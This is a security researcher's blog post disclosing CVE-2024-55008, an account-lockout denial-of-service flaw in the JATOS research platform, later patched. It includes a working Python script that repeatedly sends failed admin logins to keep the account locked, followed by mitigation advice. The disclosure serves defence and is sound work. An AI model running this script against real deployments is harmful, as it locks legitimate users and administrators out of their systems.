Open in app

Sign in

Write

Sign in

CVE-2024–55008 | JATOS v3.9.4 Account Lockout Denial-of-Service

Hacking Notes
4 min readJan 2, 2025

--

Introduction to CVE-2024–55008

CVE-2024–55008 exposes a critical vulnerability in the application’s authentication system, presenting a significant risk to user accessibility and operational integrity. This account-level denial-of-service (DoS) flaw allows attackers to lock any user accounts, including administrator accounts, by triggering the lockout mechanism through multiple failed login attempts. This can prevent legitimate users from accessing their accounts indefinitely, disrupting functionality and potentially impacting critical operations.

What is JATOS

JATOS is a powerful web-based platform designed to conduct psychological experiments and surveys online. It enables researchers to create, distribute, and gather data from participants in a controlled environment, making it a versatile tool in the field of psychological research.

The platform boasts a user-friendly interface that allows researchers to set up experiments without requiring extensive programming knowledge, making it accessible to a broader audience. Additionally, JATOS supports multi-platform usage, enabling experiments to be run on various devices, including computers, tablets, and smartphones, which significantly expands participant reach.

One of the standout features of JATOS is its real-time data collection capability, which allows researchers to gather and analyze results efficiently. It also offers integration with other tools and platforms, providing flexibility in experimental design. As an open-source software, JATOS allows researchers to customize the platform according to their specific needs, further enhancing its utility.

JATOS was developed by Kristian Lange and Elisa Filevich, who aimed to create an effective solution for online research. Speaking with Kristian, he made me understand that he is currently the only developer still maintaining JATOS. This is particularly impressive given the extensive capabilities of the platform and the demands of ongoing development and support. It’s an amazing achievement for a solo developer to sustain such a robust and widely used tool in the research community.

I want to highlight that, thanks to the excellent collaboration with Kristian, the issues identified in this blog article have been successfully patched in version 3.9.5.

Exploitation Phase

Now that we understand the authentication system vulnerability, let’s delve into the specifics of this CVE and explore how an attacker might exploit it. We’ll begin with a simple attack scenario and then present a practical use case where this vulnerability could disrupt an administrator’s access indefinitely.

Simple Exploitation

To exploit this account-level denial-of-service (DoS) vulnerability, an attacker needs only to send three failed login attempts to a targeted user account. This triggers the lockout mechanism, which temporarily blocks login attempts for the affected account. By automating this process and repeating it every minute, the lockout timer resets continuously, effectively preventing the legitimate user from accessing their account indefinitely.

Practical Use Case

An attacker could target a privileged user, such as an administrator, to disrupt system operations. By automating failed login attempts with a simple script or tool, the attacker ensures the administrator account remains persistently locked out, preventing the admin from performing critical tasks.

This issue arises because the lockout mechanism is tied to the user account attempting to authenticate rather than based on the failed attempts' source IP address. As a result, the account remains inaccessible even to the legitimate user, regardless of their device or IP. This design flaw enables any attacker with access to the login page to repeatedly lock out any user account, creating a denial-of-service scenario without requiring elevated privileges.

import requests
import time
import threading

url = "http://127.0.0.1:9000/jatos/signin/local"
payload = {"username": "admin", "password": "admin1"}

running = True

def send_requests():
    while running:
        for _ in range(3):
            try:
                response = requests.post(url, data=payload)
                print(f"Status Code: {response.status_code}")
                print(f"HTML Content:\n{response.text[:500]}")
            except Exception as e:
                print(f"Error: {e}")
        time.sleep(61) 

thread = threading.Thread(target=send_requests)
thread.start()

input("Press Enter to stop...\n")
running = False
thread.join()

print("Script stopped.")

This issue can be effectively mitigated by implementing measures that reduce the risk of exploitation while maintaining accessibility for legitimate users. For instance:

  • Implementing rate limits based on the source IP address can restrict the number of login attempts an attacker can make within a given timeframe, thereby preventing automated abuse.
  • Introducing a CAPTCHA after a certain number of failed login attempts adds an additional layer of security by ensuring that only human users can proceed, significantly reducing the likelihood of automated scripts perpetuating the attack.

By combining these approaches, the system can maintain a balance between security and usability, safeguarding user accounts from persistent lockout attacks.

Other References

For the latest updates on my developments and research, be sure to check out my GitHub profile.

--

--

Hacking Notes
Hacking Notes

Written by Hacking Notes

9 Followers
3 Following

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams